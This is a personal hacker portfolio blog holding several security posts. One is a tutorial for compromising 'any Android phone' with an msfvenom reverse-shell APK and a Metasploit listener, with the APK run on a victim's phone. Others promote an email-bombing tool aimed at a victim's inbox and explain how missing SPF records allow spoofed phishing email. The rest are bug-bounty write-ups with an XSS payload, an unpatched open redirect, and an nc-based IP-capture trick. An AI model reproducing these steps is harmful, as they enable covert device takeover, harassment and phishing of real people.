My First Strategy is committed to providing you the best service.


I pride myself with strong, flexible and top notch skills.


Xss 85%
Broken Authentications 80%
Server-Side Vulnerabilities 70%

Web Developing

PHP 90%
HTML 85%
Css/Javascript 80%

Web Designing

Freindly User Interface 90%
SEO 80%
Responsive Page Design 85%


I work With Full Attention So that i Suceeded in My Every JOB.

Pentesting Blog

I pride MySelf on bringing fresh Exploits and effective Vulnrabilities.

  • Hack Android With Metasploit

    Hello Guys! Hacker Wahab Here.This Post is about something Enjoying.In this Post i am Going to Show you How we can Hack any Android Phone with the Help of Metasploit So Lets Start,

    In this Hack Tutorial we Use Metasploit so You must have access to Following Things

    So Move Forward With Creating APK PayLoad by Following Command

    msfvenom -p android/meterpreter/reverse_tcp LHOST=[your ip address] LPORT=[Any Port] -o [APK NAME]

    Now We have to Start the postgresql Service by:-

    service postgresql start

    Now We have to Listen on Payload ( APK File) We Created From MSFCONSOLE

    By Following Commands:-
    • msfconsole
    • use exploit/multi/handler
    • set payload android/meterpreter/reverse_tcp
    • set LHOST [your Ip Address]
    • set LPORT[your Port]
    •  exploit
     And Its Done here..

    Now you have to run apk file we created in Victim Phone then you got access to his phone.

    Watch Video Demo For Better Learning:-

    Thanks for Reading.Ping me if u Face any Problem.

    My Facebook:-


    Independent Cyber Security Researcher,
  • Google Authenticated Open Redirect

    Hello Guys!

    While Testing Google Security.I found Authenticated Open Redirect Vulnerability as Google Not Accept Open Redirects so It was not accepted so i decided to share this Unpatched Bug With You.


     https://appengine.google.com/ is a Website That Redirect the App Login to User Website which is Created on

    https://console.cloud.google.com/projectselector/appengine?src=ac&pli=1 This Website Redirect Form Through https://appengine.google.com/_ah/conflogin?continue=http://www.hackerwahab.com 

    Via Google Account Login.So if We Change www.hackerwahab.com to Any Malicious website open Redirect Works.

    Steps to reproduce:
    1.go to
    2.Change www.hackerwahab.com with any malicious Site.
    3.Login With Google account Open Redirect Works

    Browser/OS: All

    Attack Scenario:-

    The attacker crafts a malicious URL that redirects users to a malicious site that performs phishing and installs malware.

    Video PoC:-

  • HW-Bomber Python based Email Bombing tool

    Hello Guys,

    Hacker Wahab here.Today i am Going to Show You My First Ever Python Developed Pentesting Tool named " HW-Bomber" is a Email Bombing Tool Which integrate with Gmail & Yahoo Server To flood Victim Email.

    Download Here:-


    Watch Tutorial:-


    For Gmail Account You Must Enable "Less Secure App" From here:-

  • What is SPF Records & Their Impact?

    Hello Guys, Hacker Wahab Here today i am going to show an Old Bug Which Only a Few Pentesters Know.Many of The Pentester's and Hacker only See DNS records for a website for Sub_Domain TakeOver and Skip SPF Records Testing.

    What is SPF/TXT Records?

    An SPF record is a type of Domain Name Service (DNS) record that identifies which mail servers are permitted to send email on behalf of your domain. The purpose of an SPF record is to prevent spammers from sending messages with forged From addresses at your domain.

    Checking Missing SPF:-

     There Are Various Ways of Checking Missing SPF Records on a website But the Most Common and Popular way is kitterman.com

    Steps to Check SPF Records on a website:-
    1. Go to Kitterman.com/spf/validiate.html
    2. Enter Target Website Ex: target.com (Do Not Add https/http or www)
    3. Hit Check SPF (IF ANY)

      If You seem any SPF Record than Domain is Not Vulnerable But if you see Nothing Here then "HURRAY! You Found a Bug"


    Attack Scenario & PoC:-

    Once There is No SPF Records.An Attacker Can Spoof Email Via any Fake Mailer Like Emkei.cz.An Attacker Can Send Email From name "Support" and Email: "support@target.com" With Social Engineering Attack He Can TakeOver User Account Let Victim Knows the Phishing Attack but When He See The Email from the Authorized Domain.He Got tricked Easily.

    Similar HackerOne Reports:-

    https://hackerone.com/reports/54779 Reward : 500$
    https://hackerone.com/reports/120 Reward: 500$

    Bonus Tip:-

    Before Reporting Issue Check the Email headers if it is "SOFTFAIL" or "FAIL" It is Not a Bug Reporting may Cause N/A.Report Only if the Header is Neutral

     Thanks for Reading

  • Stored Xss in Freelancer

    Hello Guys.Hope You are Doing Well Today i am Just Disclosing my Recent Finding on Bugcrowd.I just Founded Stored Xss Vulnerability in Main Domain of Freelancer i.e,

    I Just Reported it and Got Nice Freelancer Swag and Some Kudos I am Also expecting  Reward From Them But AnyWay.

    So, Lets Move on Towards the PoC of My Submission


    1. Login
    2. Go to the Profile and Click Edit
    3. in Bio Section add the Simple Xss Payload i.e,
    4.    "><script>alert(1);</script>
    5. Click Save
    6. Open Profile in New Tab
    7. XSS ! BOOM 

     Watch Video PoC:- 

    Report Summary:-

    Submission created
    2017-03-30 13:31:50 UTC

    State changed
    2017-03-31 06:29:04 UTC
    Freelancer Engineer changed state to resolved

    Freelancer Engineer Rewarded You With Swag 

  • Facebook Bugs | By Hacker Wahab

    Aslam-O-Alaikum(Hello) Guys Here I am this post Contain all the Bugs I Have Founded in Facebook.

    1.Open Redirect & Content Spoofing

    Vulnerability Type
    Open Redirector
    Vulnerability Scope
    Mobile Site or App
    Open Redirect & Content Spoofing
    Description and Impact

    after Getting A Lots of Low Impact i Come back with an Open Redirector issue.
    Reproduction Instructions/Proof of Concept
    In the Reporting Section of Facebook all the Sensitive options is Disclose on UrL:-

    After redirect_uri= we can add vuln web like i added in above url and after Completed_Subtitle you can add Content Spoofing Text.

    As We interested in open redirect Click Done Then in Survey They Ask Community Stars Give Them Than Click Next then Click Submit a new page Open With Vulnerable URL
    Video PoC:-
    Independent Cyber Security Researcher,
    Is this bug public or known by third parties?
    Can you reproduce this issue every time?
    How did you find this bug?
    Manually / Other

    2.Delete Primary Email(Which is Unallowed by Facebook)

    Vulnerability Type
    Privacy / Authentication
    Vulnerability Scope
    Mobile Site or App
    Delete Primary Email(Which is Unallowed by Facebook)
    Description and Impact
    My Self Abdulwahab.

    As You Know That there is no way to delete an Primary Email But i found an indirect way to Delete an Primary Email.
    Reproduction Instructions/Proof of Concept
    As You can see on {POC 1.png} that there is no way to delete Primary.In Mobile site there is also no way
    We can use this url:-
    https://m.facebook.com/settings/email/?remove_email&email{Primary email Goes here}&refid=74

    to Remove primary Email.
    When u Open The Link Account Primary email Deleted as in (POC 2.png)
    As i cannot upload video here so i use Youtube
    Video PoC( Prv8 ):-
    Independent Cyber Security Researcher,
    Is this bug public or known by third parties?
    Can you reproduce this issue every time?
    How did you find this bug?
    Manually / Other

    3.Change Account Password Without Knowing Current Password

    Vulnerability Type
    Privacy / Authentication
    Vulnerability Scope
    Main Site (www.facebook.com)
    Change Account Password Without Knowing Current Password
    Description and Impact
    My name is ABDULWAHAB,I am Writing This to you because i think i can change a Fb Account password of a logged-in Account Without knowing Current Password.
    Reproduction Instructions/Proof of Concept
    1.Go to Settings
    2.On Mobile add a Mobile Number u have access ( Enter You Mobile Number)
    4.Click Forget Password
    5.Enter Your Mobile Number you recently Added.
    6.U Receive Code enter it
    7.enter New Password And DONE!

    As You See in all Procedure i dont Use Current Password and Account Password Changed

    Fix Suggestion:-
    ask current Password Field in adding a New Phone number

    Independent Cyber Security Researcher,
    Is this bug public or known by third parties?
    Can you reproduce this issue every time?
    How did you find this bug?

    4.Ip Steal Using Content Injection

    Manually / Other
    Vulnerability Type
    Privacy / Authentication
    Vulnerability Scope
    Mobile Site or App
    Ip Steal Using Content Injection
    Description and Impact

    I Founded an Content Injection issue on mobile site of Facebook.But it has Low impact so i try to increase Risk of Vulnerability so I found a Serious Problem IP STEAL.
    Reproduction Instructions/Proof of Concept
    1.Open Kali Linux terminal
    2.Command to Listen on Port
    nc -lvnp 1337 u can use any port
    3.Login in to Facebook Account
    4.Use this Port with YourIp In Such Way:-
    https://m.facebook.com/deactivate/incentives/?carrier_name=HACKED BY ABDULWAHAB&carrier_logo_src=
    5.When User Opens This Page Ip is Captured.
    Video Poc:-
    Independent Cyber Security Researcher,
    Is this bug public or known by third parties?
    Can you reproduce this issue every time?
    How did you find this bug?
    Manually / Other

    5.Content Spoofing

    Vulnerability Type
    Other Vulnerability
    Vulnerability Scope
    Mobile Site or App
    Content Injection
    Reproduction Instructions/Proof of Concept
    1. goto Deactivate account
    2. Choose any Condition
    3.Click Deactivate
    4.Now You see an add
    5.Customize it by using its uRL

    Independent Cyber Security Researcher,
    Is this bug public or known by third parties?
    Can you reproduce this issue every time?
    How did you find this bug?
    Manually / Other

    Video PoC(ALL BUGS):-

  • Sub_Domain TakeOver iwantmyname


    Brothers and their Sisters.Today i am Going to Disclose my recent Findings on Iwantmyname(BugCrowd).
    According to This Issue I am Able to Fully Takeover a Sub_domain.

    Tool Used:-
    Knockpy ( A python Sub_Domain Finder)

  • I just Founded a Sub Domain That is Created With Domain iwantmyname.com
    This SubDomain Contains The Nameserver's and DNS Recored of WpEngine But It is not linked with any account of Wp_engine.
  • Replication Steps
    1.Go to Wpengine.com
    2.Buy a Membership
    3.Add domain
    Sub_domain Is Now Of Attacker.

  • Reward : Kudos

    Powered by Blogger.


    For enquiries you can contact M in several different ways. Contact details are below.


    • Meet-Up :Lahore,Pakistan
    • Phone :+92 3164970878
    • Country :PAKISTAN
    • Email :hackertabish786@gmail.com